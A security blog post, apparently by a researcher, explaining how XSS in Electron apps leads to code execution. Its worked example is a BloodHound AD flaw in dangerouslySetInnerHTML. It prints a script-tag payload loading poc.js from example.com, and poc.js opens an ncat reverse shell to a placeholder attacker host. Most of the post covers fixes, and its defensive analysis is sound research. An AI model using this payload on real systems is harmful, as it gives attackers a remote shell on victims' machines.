Tech Blog

Reasonably Secure Electron

Although the Electron framework has gained popularity in recent years for simplifying desktop application development, many still consider it inherently insecure. This blog examines how various Electron exploits work and how to effectively design applications that can defend against current and future attacks. A functional example of a “reasonably secure” Electron application pattern is available on GitHub

Preface

"In the face of ambiguity, refuse the temptation to guess."
-The Zen of Python

Electron is a cross-platform framework for developing desktop applications using web technologies like HTML, JavaScript, and CSS. Electron has become very popular in recent years for its ease of use, empowering developers to quickly create generally good-looking, responsive, cross-platform desktop applications. Applications from major tech companies like Microsoft Teams, VSCode, Slack, Atom, Spotify, and even secure messaging apps like Signal all use Electron or similar "native web" application frameworks. Electron did not start this trend — embedded webviews have been around for some time. For example, iMessage is developed using embedded WebKit webviews, which have been available on macOS and iOS for years. Similarly, JavaFX supports embeddable WebKit, and Windows has IE objects that can be embedded in third-party applications. For one reason or another, Electron applications (unlike the others) often garner a fervent hatred, but truth be told, Electron remains a viable and pragmatic choice for those who value development time more than their user's RAM.

Electron is also often regarded as "inherently insecure." While this reputation is not entirely undeserved, solid engineering practices can offset risky design choices. Take for example PHP, it is possible to write secure PHP code, but due to the language's often unintuitive design, it's not easy (and yes I'm aware a lot of this was fixed in PHP v7, but it's fun to beat a dead horse). Keeping that in mind, experience has taught me teaching doesn't scale. If you want to stop SQL injection across your organization, you're better off creating internal APIs and libraries that do not allow SQL injection to occur, than to teach all of your developers about SQL injection (even better yet, do both). Similarly, it's possible to write secure Electron applications, and we can even create application architectures that help developers avoid Electron's pitfalls.

In Part 1 we'll examine how various Electron exploitation techniques work, focusing primarily on cross-site scripting. In Part 2 we'll dive into how to design applications that can defend against these types of attacks, including a functional example pattern that's reasonably secure. Part 2 is based on lessons learned from building the (yet unreleased) GUI for Sliver, an implant framework for red teams that Ronan Kervella and I have been building in our spare time.


Part 1 - Out of the Browser Into the Fire

Since Electron applications are built on web application technologies, it’s no surprise that they’re often vulnerable to the same flaws found in your everyday web application. In the past, web application flaws have generally been confined to the browser's sandbox, but no such limitations exist (by default) in Electron. This change has led to a significant increase in the impact that a cross-site scripting (XSS) bug can have, since the attacker now gains access to the NodeJS APIs. Back in 2016, Matt Bryant, Shubs Shah, and I released some research on finding and exploiting these vulnerabilities in Electron and other native web frameworks. We demonstrated remote code execution vulnerabilities in Textual IRC, Azure Storage Explorer, and multiple markdown editors, as well as a flaw that allowed remote disclosure of all iMessage data on macOS, and created a cross-platform self-propagating worm in RocketChat in our presentation at Kiwicon.

But what is the root cause of XSS and why is it so hard to prevent? There's a common misconception that the proper fix for a cross-site scripting is sanitizing user input. The notion that sanitizing user input can concretely fix an XSS issue is untrue; the only proper fix for XSS is contextual output encoding. Of course it's still a good idea to sanitize user input, so do that too (with a whitelist, not a blacklist) —but do that in addition to proper output encoding. A good rule of thumb is: "sanitize input, encode output," but what does contextual encoding entail? Let's explore the details of a couple recent exploits to better understand how XSS manifests and how to prevent it.

Bloodhound AD

We'll first look at a couple vulnerabilities I found in the Bloodhound AD tool, one of which was independently discovered by Fab.

Bloodhound is an incredibly powerful tool for analyzing the structure of Windows Active Directory deployments, and finding ways to exploit the various privilege relationships therein. To start, the attacker (or defender) runs an ingestor script that dumps data from Active Directory into JSON. The JSON is then parsed into a Neo4j database, and an Electron GUI can be used to query and view the results in a nice graph view. A quick look at the code reveals the application is primarily based on React. React, generally speaking and for reasons we'll discuss later, is very good at preventing cross-site scripting attacks, but edge cases do exist. Such an edge case is the use of the dangerouslySetInnerHTML() function. This function is similar in functionality to a DOM element's .innerHTML (also dangerous); the function takes in a string and parses it as HTML.

Using candidate point analysis, we first perform a quick search of the unpatched Bloodhound AD codebase and find four instances of this function being used, one excerpt below:

HelpModal.jsx 
<Modal.Body>
<Tabs
defaultActiveKey={1}
id='help-tab-container'
justified
>

<Tab
eventKey={1}
title='Info'
dangerouslySetInnerHTML={this.state.infoTabContent}
/>

In the excerpt above we can see an attribute of this this.state object is passed to our candidate point dangerouslySetInnerHTML() From this sink, we'll trace backwards to determine if the issue is exploitable, and looking at the definition of this.state we can see that it's a basic JavaScript object initialized with empty strings, including the .infoTabContent attribute, which is passed as a parameter to our sink:

HelpModal.jsx 
export default class HelpModal extends Component {
constructor() {
super();
this.state = {
open: false,
infoTabContent: '',
abuseTabContent: '',
opsecTabContent: '',
referencesTabContent: '',
};

So next we must determine how .infoTabContent  is set, jumping to the next usage of infoTabContent  we find:

HelpModal.jsx
this.setState({ infoTabContent: { __html: formatted } });

Here we see the empty string infoTabContent is replaced with a JavaScript object with the key
 __html
, this aligns with React's documentation of how dangerouslySetInnerHTML works and is a good indication that we've correctly traced the code and this value is indeed passed to our sink. The __html key's value is the  formatted  variable. So from here we must determine what the variable is, and what it contains. Scrolling up a bit we can see that formatted is just a string, which is built using string interpolation with variables ${sourceName}  and ${targetName:

HelpModal.jsx
} else if (edge.label === 'SQLAdmin') {

formatted = `The user ${sourceName} is a SQL admin on the computer ${targetName}.
There is at least one MSSQL instance running on ${targetName} where the
user
${sourceName} is the account configured to run the SQL Server instance.

Based on my usage and understanding of the tool, and as the help dialog helpfully points out, these values are based on data collected by the ingestor script from Active Directory (i.e., from an 'untrusted' source), and therefore "attacker"-controlled (note the ironic inversion of 'attacker' in this context). This confirms the exploitability of our candidate point; attacker-controlled content is indeed passed to dangerouslySetInnerHTML. All an attacker needs to do is plant malicious values (like a GPO in Fab's demonstration), with the following name:

aaaaaa<SCRIPT SRC="http://example.com/poc.js">

Where poc.js contains:

const { spawn } = require('child_process');

spawn('ncat', ['-e', '/bin/bash', '<attacker host>', '<some port>']);

Since the GPO name is not properly encoded, it will be rendered by the DOM as HTML, and Electron will parse the <script> tag and dutifully retrieve and execute the context of poc.js. As discussed before, since the NodeJS APIs are enabled, this attacker-controlled JavaScript can simply spawn a Bash child process and execute arbitrary native code on the machine.

A reasonable scenario for this exploit would be a blue team hiding malicious values in their AD deployment, waiting for the red team to run Bloodhound, and subsequently exploiting the red team operator's machine. From the opposite side, a red team operator in a position to influence the data collected by Bloodhound (but with otherwise limited access to AD) could exploit this in the traditional direction too.

The most comprehensive fix for this vulnerability would be to re-write the functionality such that
dangerouslySetInnerHTML is not needed. However, from a practical perspective, a lot of code would need to be refactored. A short term and effective fix is to HTML encode the attacker-controlled variables. By HTML encoding these values, we can ensure these strings are never interpreted by the browser as actual HTML, and can support arbitrary characters. The prior payload: aaaaaa<SCRIPT SRC="http://example.com/poc.js"> will be encoded as aaaaaa&lt;SCRIPT SRC="http://example.com/poc.js"&gt; and will be displayed as aaaaaa<SCRIPT SRC="http://example.com/poc.js"> but not interpreted as HTML. So is preventing cross-site scripting a simple matter of HTML encoding attacker-controlled values? Unfortunately no.

In another area of the application the Mustache template library is used to render tool tips. The Mustache library HTML encodes by default, another potential fix for the prior vulnerability would be to switch from string interpolation to Mustache templates. However, as we discussed the proper fix is contextual encoding, not blanket HTML encoding. HTML encoding will prevent XSS in an HTML context, but when used outside of an HTML context it will fail, or only coincidentally prevent XSS.

Looking at the usage of Mustache in Bloodhound, we see that a few values are passed to the tooltips, notably label is attacker-controlled:

nodeTooltip.html
<div class="header">

</div>
<ul class="tooltip-ul">
{